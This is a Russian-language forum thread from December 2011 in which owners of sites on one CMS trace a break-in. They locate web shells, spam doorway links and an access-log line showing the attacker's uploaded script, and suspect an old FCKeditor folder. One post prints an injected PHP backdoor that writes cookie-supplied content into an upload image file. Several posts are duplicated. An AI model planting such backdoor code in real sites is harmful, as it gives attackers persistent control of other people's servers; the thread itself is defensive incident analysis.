Katerina, можно пример посмотреть, что у себя проверить?Один код нашла в template, который запрашивает USER_AGENT.
#16
3 декабря 2011 в 14:11
#17
3 декабря 2011 в 14:23
<?php if(@$_COOKIE['pplicookie'] != 'presscookie') { @$doma_in = @file_get_contents('/var/www/p[b]имя сайта[/b]/data/www/[b]имя сайта[/b].ru/upload/117.jpg'); if (@$_COOKIE['hphpallcookie']) { @file_put_contents ('/var/www/p[b]имя сайта[/b]/data/www/[b]имя сайта[/b].ru/upload/117.jpg',@$_COOKIE['hphpallcookie']); } ?>
Я не знаю, что это такое… Там же узнала про картинку 117.
#18
3 декабря 2011 в 15:17
ищите новые файлы с момента предполагаемого взлома и измененные файлы. у вас точно есть доступ со стороны к файловой системе, раз коды внедряют. чистки не помогут, удалите код, но шелл то остался и вопрос времени когда он появится снова.
зайдите в логи сервера и сделайте поиск по имени файла в котором эти изменения.надо узнать с какого айпи он запрашивался. далее искать какие еще файлы запрашивались с этого айпи и есть вероятность что увидете через что был вход. а если ломал школоло и работал с одной прокси, то по истории увидите и способ как он загрузил шелл.
зайдите в логи сервера и сделайте поиск по имени файла в котором эти изменения.надо узнать с какого айпи он запрашивался. далее искать какие еще файлы запрашивались с этого айпи и есть вероятность что увидете через что был вход. а если ломал школоло и работал с одной прокси, то по истории увидите и способ как он загрузил шелл.
Сегодня в 00:02
у себя template такого не нашел
вот такое
----------------
вот такое
----------------
<a href="://.ru/components/cats/viewforum-2-1.html">Кряки</a><br> <ul> <a href="://.ru/components/cats/viewtopic-729529.html">Nero 7 11 10 0 серийный номер</a><br> <a href="://.ru/components/cats/viewtopic-369376.html">Creck бесплатно Alcohol120 retail 1 9 8 7612</a><br> <a href="://.ru/components/cats/viewtopic-44641.html">Crack 401111</a><br> <a href="://.ru/components/cats/viewtopic-38178.html">Драйвера ati radeon x 300 x550 x1050</a><br> <a href="://.ru/components/cats/viewtopic-224401.html">Алкоголь 120 с кряком</a><br> <a href="://.ru/components/cats/viewtopic-122677.html">Divinity 2 русификатор звука</a><br> <a href="://.ru/components/cats/viewtopic-808205.html">ITE IT8212 ATA RAID Controller win7</a><br> <a href="://.ru/components/cats/viewtopic-101149.html">Драйвера бесплатно xerox phaser 3117</a><br> <a href="://.ru/components/cats/viewtopic-744192.html">Дрова на Nokia 5300</a><br> <a href="://.ru/components/cats/viewtopic-139094.html">Кодеки на wmp xp mp4</a><br> <a href="://.ru/components/cats/viewtopic-936116.html">Качай ACID Pro</a><br>
#20
3 декабря 2011 в 19:21
Буквально на днях получил письмо:
-------------------------------
Добрый день. Мы хотим предложить для вашего сайта **********.com получить дополнительную ежедневную прибыль в партнерской системе ******.ru
В среднем ваш сайт посещает 600 пользователей в сутки, 5-10% из которых заходят с мобильных телефонов.
Мобильные посетители практически бесполезны для веб-сайта — они не качают файлы и не кликают на рекламу. Монетизировать их в рамках веб-сайта довольно сложно.
Мы готовы оплачивать данный тип трафика и перенаправлять его тематическим рекламодателям в сфере мобильного интернета. По нашим расчетам, дополнительный доход от Вашего сайта при текущей посещаемости составит около 36 руб. в день!
Преимущества работы с нами:
— Мы выкупаем мобильных пользователей абсолютно всех стран на самых выгодных условиях, благодаря сотрудничеству с крупнейшими рекламодателями
— Никакой рекламы и ссылок на Вашем сайте. Код всего-лишь перенаправляет мобильных пользователей. При этом он полностью безопасен для поисковых систем
— Еженедельные автоматические выплаты на WebMoney без задержек. Досрочные выплаты тоже возможны
— Детальная статистика выкупленного трафика
— Простая установка кода, которая занимает не более 30 секунд
— Отзывчивая техническая поддержка
-------------------------------
Уже и сервисы скупки такого трафика существуют.
-------------------------------
Добрый день. Мы хотим предложить для вашего сайта **********.com получить дополнительную ежедневную прибыль в партнерской системе ******.ru
В среднем ваш сайт посещает 600 пользователей в сутки, 5-10% из которых заходят с мобильных телефонов.
Мобильные посетители практически бесполезны для веб-сайта — они не качают файлы и не кликают на рекламу. Монетизировать их в рамках веб-сайта довольно сложно.
Мы готовы оплачивать данный тип трафика и перенаправлять его тематическим рекламодателям в сфере мобильного интернета. По нашим расчетам, дополнительный доход от Вашего сайта при текущей посещаемости составит около 36 руб. в день!
Преимущества работы с нами:
— Мы выкупаем мобильных пользователей абсолютно всех стран на самых выгодных условиях, благодаря сотрудничеству с крупнейшими рекламодателями
— Никакой рекламы и ссылок на Вашем сайте. Код всего-лишь перенаправляет мобильных пользователей. При этом он полностью безопасен для поисковых систем
— Еженедельные автоматические выплаты на WebMoney без задержек. Досрочные выплаты тоже возможны
— Детальная статистика выкупленного трафика
— Простая установка кода, которая занимает не более 30 секунд
— Отзывчивая техническая поддержка
-------------------------------
Уже и сервисы скупки такого трафика существуют.
#21
3 декабря 2011 в 20:40
от сервисов и идет пляска. поинтересуйся сколько счас рубят люди на мобильном трафе, хотя бы на той же опере мини😊другое дело что находятся уроды которые предпочитают украсть чужой траффик.
#22
3 декабря 2011 в 20:42
Нашли шелл в cgi-bin — Файл test.pl
#23
3 декабря 2011 в 21:01
я счас у lezginka.ru, фтп глянул. там вообще ахтунг. у него не только шелл в /includes/smarty/libs/fcuk но и еще куча страниц. вообще он и не знал что у него там дорвей. там же и файлик c шеллом. жаль пока нет доступа к логам сервера глянуть чего там еще интересного :)
#24
3 декабря 2011 в 21:02
И о поиске по времени изменения: дата создания файла была выставлена на 2010, хотя при сравнении полных бэкапов выяснилось, что появился этот файл в ноябре 2011, так что поиск по дате изменения был бы бесполезен.
#25
3 декабря 2011 в 21:09
/wysiwyg/editor/images/metadata.jpg — еще один шелл. причем ему ничерта не мешает выполнится. там внутри php
похоже что взломы идут через дырявый fckeditor буть он неладен.
файл загружен 27 января этого года. были какие-то исправления безопасности с того времени связанные редактором? я так понимаю это еще на 1.7 версии его подгрузии. а вот первый найденый шелл тот от июня месяца, то-есть уже на 1.8 версии. но тут не факт что смарти виноват, так как вроде он на последней стабильной версии своей ветки.
похоже что взломы идут через дырявый fckeditor буть он неладен.
файл загружен 27 января этого года. были какие-то исправления безопасности с того времени связанные редактором? я так понимаю это еще на 1.7 версии его подгрузии. а вот первый найденый шелл тот от июня месяца, то-есть уже на 1.8 версии. но тут не факт что смарти виноват, так как вроде он на последней стабильной версии своей ветки.
#26
3 декабря 2011 в 21:10
picaboo, прав
у меня они оказывается давно сидят, я уже начинал чувствовать себя в гостях :)
яндекс сам меня предупредил и потом только я проверил
у меня они оказывается давно сидят, я уже начинал чувствовать себя в гостях :)
яндекс сам меня предупредил и потом только я проверил
#27
3 декабря 2011 в 21:16
а вот и сам виноват:). кто так обновляет движок. весь, пардон, срач от старого остался. дырка в визивинге? — дык он там лежит от 2009 года. ясен пень что там дыр куча и все в паблике. другое дело что двиг уже не использует эту папку и её надо было грохнуть, а не держать на сервере потенциальную угрозу
#28
3 декабря 2011 в 21:23
да тут походу драка целая :)))
третий шел.
28/10/10 russian.php в папке languages
третий шел.
28/10/10 russian.php в папке languages
#29
3 декабря 2011 в 22:21
подвожу промежуточный итог взлома, через шелл:
/wysiwyg/editor/images/metadata.jpg — еще один шелл.
28/10/10 russian.php в папке languages
Нашли шелл в cgi-bin — Файл test.pl
/includes/smarty/libs/fcuk
/wysiwyg/editor/images/metadata.jpg — еще один шелл.
28/10/10 russian.php в папке languages
Нашли шелл в cgi-bin — Файл test.pl
/includes/smarty/libs/fcuk
#30
5 декабря 2011 в 22:58
ну собственно вчера попался засранец.
Line 11025: 94.228.220.68 — - [04/Dec/2011:22:42:22 +0400] "GET /upload/userfiles/211/hey.php HTTP/1.0" 200 145901
грузанул через профиль файлик и пошел шастать по системе.
какой вывод? а вывод один — если у вас стоит версия 1.8, сходите в магазин и купите ченить к чаю — гости к вам часто будут ходить
Line 11025: 94.228.220.68 — - [04/Dec/2011:22:42:22 +0400] "GET /upload/userfiles/211/hey.php HTTP/1.0" 200 145901
грузанул через профиль файлик и пошел шастать по системе.
какой вывод? а вывод один — если у вас стоит версия 1.8, сходите в магазин и купите ченить к чаю — гости к вам часто будут ходить